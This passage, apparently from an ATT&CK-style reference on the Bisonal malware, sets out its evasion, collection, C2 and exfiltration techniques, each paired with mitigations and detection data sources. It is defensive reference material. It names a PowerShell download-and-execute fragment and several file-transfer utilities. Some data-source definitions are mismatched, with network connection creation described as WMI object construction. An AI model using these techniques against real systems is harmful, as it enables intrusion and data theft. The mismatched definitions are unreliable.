Monitor for newly executed processes that may gather the system time and/or time zone from a local or remote system.

Virtualization/Sandbox Evasion


Bisonal can check to determine if the compromised system is running on VMware.

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may employ various means to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.

Virtualization/Sandbox Evasion


Time Based Evasion

Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: Scheduled Task/Job). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled Multi-Stage Channels to avoid analysis and scrutiny.

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as Pings, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments. Another variation, commonly referred to as API hammering, involves making various calls to Native API functions in order to delay execution (while also potentially overloading analysis environments with junk data).

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may employ various time-based methods to detect and avoid virtualization and analysis environments. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.

Data from Local System


Bisonal has collected information from a compromised host.

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information. Adversaries may also use Automated Collection on the local system.

Data Loss Prevention

Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may search and collect local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

File: File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

Monitor for unexpected/abnormal access to files that may be malicious collection of local data, such as user files (pdf, .docx, .jpg, etc.) or local databases.

Process: OS API Execution

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

Process: Process Creation

Birth of a new running process (ex: Sysmon EID 1 or Windows EID 4688)

Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.

Script: Script Execution

Launching a list of commands through a script file (ex: Windows EID 4104)

Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Application Layer Protocol

Command and Control

Web Protocols

Bisonal has used HTTP for C2 communications.

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.

Monitoring the following activities in your Organization can help you detect this technique.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor for web traffic to/from known-bad or suspicious domains and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).


Command and Control

Bisonal has supported use of a proxy server.

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap.  Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

Filter Network Traffic

Traffic to known anonymity networks and C2 infrastructure can be blocked through the use of network allow and block lists. It should be noted that this kind of blocking may be circumvented by other techniques like Domain Fronting.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific C2 protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.

SSL/TLS Inspection

If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.

Monitoring the following activities in your Organization can help you detect this technique.

Network Traffic: Network Connection Creation

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Non-Application Layer Protocol

Command and Control

Bisonal has used raw sockets for network communication.

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts. However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

Filter Network Traffic

Filter network traffic to prevent use of protocols across the network boundary that are unnecessary.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.

Network Segmentation

Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.

Monitoring the following activities in your Organization can help you detect this technique.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Ingress Tool Transfer

Command and Control

Bisonal has the capability to download files to execute on the victim’s machine.

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.

On Windows, adversaries may use various utilities to download tools, such as copy, finger, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.

Monitoring the following activities in your Organization can help you detect this technique.

File: File Creation

Initial construction of a new file (ex: Sysmon EID 11)

Monitor for file creation and files transferred into the network

Network Traffic: Network Connection Creation

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs.

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Data Encoding

Command and Control

Standard Encoding

Bisonal has encoded binary data with Base64 and ASCII.

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.

Monitoring the following activities in your Organization can help you detect this technique.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor for network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Dynamic Resolution

Command and Control

Bisonal has used a dynamic DNS service for C2.

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Malware researchers can reverse engineer malware variants that use dynamic resolution and determine future C2 infrastructure that the malware will attempt to contact, but this is a time and resource intensive effort.

Restrict Web-Based Content

In some cases a local DNS sinkhole may be used to help prevent behaviors associated with dynamic resolution.

Monitoring the following activities in your Organization can help you detect this technique.

Network Traffic: Network Connection Creation

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Encrypted Channel

Command and Control

Symmetric Cryptography

Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.

Monitoring the following activities in your Organization can help you detect this technique.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Exfiltration Over C2 Channel


Bisonal has added the exfiltrated data to the URL over the C2 channel.

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

Data Loss Prevention

Data loss prevention can detect and block sensitive data being sent over unencrypted protocols.

Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools.

Monitoring the following activities in your Organization can help you detect this technique.

Command: Command Execution

Invoking a computer program directive to perform a specific task (ex: Windows EID 4688 of cmd.exe showing command-line parameters, ~/.bash_history, or ~/.zsh_history)

Monitor executed commands and arguments that may steal data by exfiltrating it over an existing command and control channel.

File: File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

Monitor for suspicious files (i.e. .pdf, .docx, .jpg, etc.) viewed in isolation that may steal data by exfiltrating it over an existing command and control channel.

Network Traffic: Network Connection Creation

Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)

Monitor for newly constructed network connections that are sent or received by untrusted hosts.

Network Traffic: Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Network Traffic: Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.